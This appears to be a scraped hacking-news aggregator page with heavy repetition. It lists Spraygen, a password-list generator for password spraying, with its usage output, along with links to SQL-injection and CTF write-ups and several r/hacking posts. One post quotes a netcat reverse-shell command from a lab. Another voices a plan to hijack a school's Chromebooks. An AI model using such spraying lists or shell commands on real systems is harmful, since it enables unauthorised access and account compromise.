Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Spraygen - Password List Generator For Password Spraying
https://1.bp.blogspot.com/-sNBXv7XKcW8/YHpLAOO6l2I/AAAAAAAAV5Q/Sre23VOXPEg82SUrH9WCSL5Z7jnBXIE4QCNcBGAsYHQ/w640-h402/spraygen_1_spraygenlogo.png Password list generator for password spraying - prebaked with goodies
Version 1.4
Generates permutations of Months, Seasons, Years, Sports Teams (NFL, NBA, MLB, NHL), Sports Scores, "Password", and even Iterable Keyspaces of a specified size.
All permutations are generated with common attributes appended/prepended (such as "!" or "#"), or custom separators (such as "." or "_").
Users can extend the attributes and separators using comma delimited lists of characters.
Spraygen also accepts single words or external wordlists that allow you to generate tuned custom wordlists in addition to what is already provided.
You could use tools like crunch, a fancy bash loop over SecLists, or whatever have you but that takes time...this one is made for spraying, so get to it!
Spraygen - Password List Generator For Password Spraying
https://1.bp.blogspot.com/-sNBXv7XKcW8/YHpLAOO6l2I/AAAAAAAAV5Q/Sre23VOXPEg82SUrH9WCSL5Z7jnBXIE4QCNcBGAsYHQ/w640-h402/spraygen_1_spraygenlogo.png Password list generator for password spraying - prebaked with goodies
Version 1.4
Generates permutations of Months, Seasons, Years, Sports Teams (NFL, NBA, MLB, NHL), Sports Scores, "Password", and even Iterable Keyspaces of a specified size.
All permutations are generated with common attributes appended/prepended (such as "!" or "#"), or custom separators (such as "." or "_").
Users can extend the attributes and separators using comma delimited lists of characters.
Spraygen also accepts single words or external wordlists that allow you to generate tuned custom wordlists in addition to what is already provided.
You could use tools like crunch, a fancy bash loop over SecLists, or whatever have you but that takes time...this one is made for spraying, so get to it!
python3 spraygen.py -h
_
( \_
( \_
( \_
( \_ ___
( Password \ | |
( Spray |คคคคคคคค|___|
( _ / |
( _ / /~~~~~~~~~\
( _ / ( Spray )
(_/ | This |
| |
| Get |
| Creds |
|_________|
Original Art by Alex Chudnovsky (Unaffiliated)
Spraygen tool by 3ndG4me
Version 1.4
usage: spraygen.py [-h] [--year_start YEAR_START] [--year_end YEAR_END] [-s separators] [-a attributes] [-w wordlist] [-n single word] [--mode {all,nosep,noattr,years,plain,custom}]
[--type {all,iterative,sports,nfl,nba,mlb,nhl,months,seasons,password,custom}] [--iter {ascii,num ,spec,asciinum,asciispec,numspec,full}] [--size SIZE] [--min_length MIN_LENGTH] [--max_length MAX_LENGTH]
[-o output file] [-p] [--sort {nosort,asc,desc,random}] [-v]
Parse Spray List Arguments.
optional arguments:
-h, --help show this help message and exit
--year_start YEAR_START
starting year for a range of years
--year_end YEAR_END ending year for a range of years
-s separators a comma delimited list of one or more separators
-a attributes a comma delimited list of one or more attributes
-w wordlist path to a custom wordlist
-n single word single custom word to generate a custom wordlist with
--mode {all,nosep,noattr,ye ars,plain,custom}
Mode for list generation. Can be all, no separators, no attributes, only years, plain, or custom (will only use parameters passed into -s or -a).
--type {all,iterative,sports,nfl,nba,mlb,nhl,months,seasons,password,custom}
Type of list to generate. Can be all, iterative, sports, nfl, nba, mlb, nhl, months, seasons, password, or custom. Choosing 'all' executes all options except for 'iterative' which must be run
manually.
--iter {ascii,num,spec,asciinum,asciispec,numspec,full}
Keyspace mode for iterative list generation. Only works when --type is set to 'iterative'. Can be ascii, num, spec, asciinum, asciispec, numspec, or full. Will generate all permutations of the
selected keyspace with a given length set with the --size parameter.
--size SIZE Length of passwords generated by a set keyspace. Only works when --type is set to 'iterative' and an --iter keyspace mode is set.
--min_length MIN_LENGTH
Minimum length of passwords to include in the list. (Default: 1)
--max_length MAX_LENGTH
Maximum length of passwords to include in the list (Default: 999)
-o output file name of a file to create and write the final output to
-p prints the output line by line as plaintext
--sort {nosort,asc,desc,random}
Sort final output. Sorting methods supported are nosort, asc, desc, random.
-v prints the current version of spraygen and exits Basic Usage1. Install depende[...]
Hacking Articles Tips Tricks Videos Tutorials
KitPloit - PenTest Tools! Spraygen - Password List Generator For Password Spraying https://1.bp.blogspot.com/-sNBXv7XKcW8/YHpLAOO6l2I/AAAAAAAAV5Q/Sre23VOXPEg82SUrH9WCSL5Z7jnBXIE4QCNcBGAsYHQ/w640-h402/spraygen_1_spraygenlogo.png Password list generator for…
ncies
pip3 install -r requirements.txt2. Run python3 spraygen.py -p- this will generate all default built in wordlists with all permutations and print them to the screen Credits* @MarkoH17 - for the boolean python3.8 backwards compatibility fix Download Spraygen
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Anyone know about the music leaking site DBREE?
I need someone to pm me (I DO NOT WANT TO ILLEGALLY PIRATE MUSIC BTW)
submitted by /u/AphexyTwin
[link] [comments]
Anyone know about the music leaking site DBREE?
I need someone to pm me (I DO NOT WANT TO ILLEGALLY PIRATE MUSIC BTW)
submitted by /u/AphexyTwin
[link] [comments]
reddit
Anyone know about the music leaking site DBREE?
I need someone to pm me
hacking: security in practice
Open file extension .thumbnail made in Samsung gallery?
I have a file that ends in .thumbnail extension over 200mb in size. It’s proprietary to Samsung gallery. I’ve tried to open in native app without results. I’ve tried changing the extension to zip and 7z with no success Of extraction
Does anyone have suggestions on how up open this archive and view the thumbnails inside?
submitted by /u/notagoodapple
[link] [comments]
Open file extension .thumbnail made in Samsung gallery?
I have a file that ends in .thumbnail extension over 200mb in size. It’s proprietary to Samsung gallery. I’ve tried to open in native app without results. I’ve tried changing the extension to zip and 7z with no success Of extraction
Does anyone have suggestions on how up open this archive and view the thumbnails inside?
submitted by /u/notagoodapple
[link] [comments]
reddit
Open file extension .thumbnail made in Samsung gallery?
I have a file that ends in .thumbnail extension over 200mb in size. It’s proprietary to Samsung gallery. I’ve tried to open in native app without...
Algunos tips para inyecciones SQL
https://y000o.medium.com/algunos-tips-para-inyecciones-sql-2924702c553c?source=rss------bug_bounty-5
https://y000o.medium.com/algunos-tips-para-inyecciones-sql-2924702c553c?source=rss------bug_bounty-5
En este escrito dejaré algunos tips para inyecciones sql, en donde trataré de explicar solamente puntos específicos.Continue reading on Medium » (https://y000o.medium.com/algunos-tips-para-inyecciones-sql-2924702c553c?source=rss------bug_bounty-5)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How to install Kali Linux tools on Windows 10
https://cdn-images-1.medium.com/max/798/0*VnSUUyY0DI2J-EQ9.png
You don’t need a VM or a VPS to use Kali Linux tools, you can do it right here in Windows 10…
Continue reading on Medium »
How to install Kali Linux tools on Windows 10
https://cdn-images-1.medium.com/max/798/0*VnSUUyY0DI2J-EQ9.png
You don’t need a VM or a VPS to use Kali Linux tools, you can do it right here in Windows 10…
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Some tips for SQL injections
https://cdn-images-1.medium.com/max/600/1*gkQI2NIeJxpKqflNr4TBbg.png
In this writing I will leave some tips for sql injections, where I will try to explain only specific points.
Continue reading on Nerd For Tech »
Some tips for SQL injections
https://cdn-images-1.medium.com/max/600/1*gkQI2NIeJxpKqflNr4TBbg.png
In this writing I will leave some tips for sql injections, where I will try to explain only specific points.
Continue reading on Nerd For Tech »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HackTheBox Writeup — Laboratory
https://cdn-images-1.medium.com/max/1920/0*AsKTz3IpxcY_LZaZ
Hello Guys , I am Faisal Husaini. My username on HTB is “feodore” . Also join me on discord.
Continue reading on Medium »
HackTheBox Writeup — Laboratory
https://cdn-images-1.medium.com/max/1920/0*AsKTz3IpxcY_LZaZ
Hello Guys , I am Faisal Husaini. My username on HTB is “feodore” . Also join me on discord.
Continue reading on Medium »
Algunos tips para inyecciones SQL
En este escrito dejaré algunos tips para inyecciones sql, en donde trataré de explicar solamente puntos específicos.Continue reading on Medium »
Read more...
En este escrito dejaré algunos tips para inyecciones sql, en donde trataré de explicar solamente puntos específicos.Continue reading on Medium »
Read more...
hacking: security in practice
New to learning about reverse shells and practicing in VM’s. Not getting output on “my” machine, but getting output on the target machine for commands I send on my machine to the target. How do I get the output only on my machine?
So on one machine I just have it listening for a connection, and on the other machine I used the command “nc -v IP port | /bin/bash
I piped it to /bin/bash because the version of ncat that’s downloaded on my lab environment does not come with the “-e” option to execute a command. I started messing around and piping it worked.
I’m able to send commands to the target machine, but I don’t get any output to my local machine. The output shows on the target machine.
From video tutorials I’ve watched, you are able to see the output on your local machine. However, in these vids, they are using the -e option.
So what’s the difference between -e /bin/bash and | /bin/bash?
submitted by /u/Imaboy2020
[link] [comments]
New to learning about reverse shells and practicing in VM’s. Not getting output on “my” machine, but getting output on the target machine for commands I send on my machine to the target. How do I get the output only on my machine?
So on one machine I just have it listening for a connection, and on the other machine I used the command “nc -v IP port | /bin/bash
I piped it to /bin/bash because the version of ncat that’s downloaded on my lab environment does not come with the “-e” option to execute a command. I started messing around and piping it worked.
I’m able to send commands to the target machine, but I don’t get any output to my local machine. The output shows on the target machine.
From video tutorials I’ve watched, you are able to see the output on your local machine. However, in these vids, they are using the -e option.
So what’s the difference between -e /bin/bash and | /bin/bash?
submitted by /u/Imaboy2020
[link] [comments]
reddit
New to learning about reverse shells and practicing in VM’s. Not...
So on one machine I just have it listening for a connection, and on the other machine I used the command “nc -v IP port | /bin/bash I piped it to...
hacking: security in practice
I hate school
The local high school in my community is borderline fascist. Home schoolers such as myself have no chance because they are involved with most events around here. I want to get its IP address and do a thing to Rick roll every single chromebook on the network. I don't want to do a virus for legal concerns and want to do it without asking a student there. Not asking for a freebie, just some advice.
submitted by /u/ChoiceLunch9404
[link] [comments]
I hate school
The local high school in my community is borderline fascist. Home schoolers such as myself have no chance because they are involved with most events around here. I want to get its IP address and do a thing to Rick roll every single chromebook on the network. I don't want to do a virus for legal concerns and want to do it without asking a student there. Not asking for a freebie, just some advice.
submitted by /u/ChoiceLunch9404
[link] [comments]
reddit
I hate school
The local high school in my community is borderline fascist. Home schoolers such as myself have no chance because they are involved with most...
hacking: security in practice
If you can decode this you can take what's on it (1ETH)
submitted by /u/techstress
[link] [comments]
If you can decode this you can take what's on it (1ETH)
submitted by /u/techstress
[link] [comments]
reddit
If you can decode this you can take what's on it (1ETH)
Posted in r/hacking by u/techstress • 1 point and 0 comments